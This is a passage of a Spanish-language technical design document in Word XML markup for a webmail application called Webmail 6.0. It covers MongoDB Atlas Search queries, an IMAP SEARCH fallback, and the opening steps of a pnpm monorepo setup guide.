      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> accountId</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'accountId'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> } }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> searchTerm</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'textPreview'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'from.name'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">fuzzy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">maxEdits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> } }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DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$sort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">date</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 }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$limit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Las capacidades que Atlas Search añaden sobre índices MongoDB nativos incluyen: búsqueda fuzzy (tolerancia a errores tipográficos), highlighting de términos coincidentes, autocompletado (typeahead), sinónimos, y scoring de relevancia con boosting de campos. Atlas Search cubre aproximadamente el 90% de los casos de uso de búsqueda en email</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[132]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="171"/>
    <w:bookmarkStart w:id="172" w:name="fallback-imap-search"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.5.3 Fallback IMAP SEARCH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cuando MongoDB no contiene el correo buscado (por ejemplo, si el usuario deshabilitó la sincronización para una carpeta de archivo) o cuando la instancia no utiliza MongoDB Atlas, Webmail 6.0 recurre al comando IMAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SEARCH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Este comando busca directamente en el servidor IMAP, con la latencia adicional de la comunicación de red pero sin dependencia de datos locales:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Fallback: búsqueda IMAP server-side</w:t>
      </w:r>
      <w:r>
        <w:br/>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imapClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">header</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searchTerm]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">})</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// results contiene UIDs coincidentes; fetchear headers bajo demanda</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La búsqueda IMAP soporta criterios como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">TO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SUBJECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BODY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SINCE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BEFORE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">LARGER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SMALLER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, y combinaciones booleanas. Sin embargo, no soporta búsqueda fuzzy ni ranking de relevancia, por lo que su UX es inferior a la búsqueda local. Webmail 6.0 utiliza IMAP SEARCH como último recurso, mostrando al usuario una indicación de que la búsqueda puede ser lenta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La combinación de índices MongoDB locales, Atlas Search cuando está disponible, y IMAP SEARCH como fallback garantiza que el usuario siempre pueda encontrar correos independientemente de la configuración de sincronización o el estado de conectividad, manteniendo la latencia por debajo de 200 ms para el 95% de las búsquedas sobre datos sincronizados.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="172"/>
    <w:bookmarkEnd w:id="173"/>
    <w:bookmarkEnd w:id="174"/>
    <w:bookmarkEnd w:id="175"/>
    <w:bookmarkStart w:id="200" w:name="guía-de-implementación-paso-a-paso"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11. Guía de Implementación Paso a Paso</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este capítulo presenta una guía de implementación específica y ejecutable para construir Webmail 6.0 en siete semanas. Cada fase incluye comandos exactos, archivos de configuración y criterios de validación. La estructura sigue un monorepo con workspaces de pnpm, Docker Compose para infraestructura y TypeScript strict en todo el stack.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="179" w:name="fase-1-setup-inicial-semana-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.1 Fase 1: Setup Inicial (Semana 1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Objetivos:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Establecer la estructura del monorepo, configurar Docker Compose con todos los servicios de infraestructura y aplicar estandarización de código.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Entregables:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Repositorio inicializado, contenedores levantados, linting configurado.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="176" w:name="monorepo-con-pnpm-workspaces"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.1.1 Monorepo con pnpm Workspaces</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El monorepo se organiza en tres packages principales:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">packages/web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Vue 3 frontend),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">packages/api</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Fastify backend) y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">packages/shared</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(tipos y utilidades compartidos).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Crear estructura del proyecto</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> webmail6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> webmail6</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> init</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">corepack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> enable</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">corepack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> prepare pnpm@9.15.0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--activate</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Inicializar workspaces</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> pnpm-workspace.yaml </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;&lt; 'EOF'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">packages:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  - 'packages/*'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">EOF</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Package root con scripts globales</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> package.json </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;&lt; 'EOF'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  "name": "webmail6",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  "version": "0.1.0",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  "private": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  "packageManager": "pnpm@9.15.0",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  "scripts": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "dev": "pnpm -r --parallel dev",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "build": "pnpm -r build",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "lint": "pnpm -r lint",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "test": "pnpm -r test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "test:unit": "pnpm -r --parallel test:unit",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "test:e2e": "pnpm -r test:e2e",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "typecheck": "pnpm -r typecheck"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  "devDependencies": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "@types/node": "^22.10.0",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "typescript": "^5.7.0",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "eslint": "^9.17.0",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "@eslint/js": "^9.17.0",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "prettier": "^3.4.0",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "globals": "^15.14.0"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">EOF</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Crear directorios</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> packages/shared/src packages/api/src packages/web/src</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Package shared (tipos, schemas, utilidades)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> packages/shared/package.json </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;&lt; 'EOF'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  "name": "@webmail6/shared",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
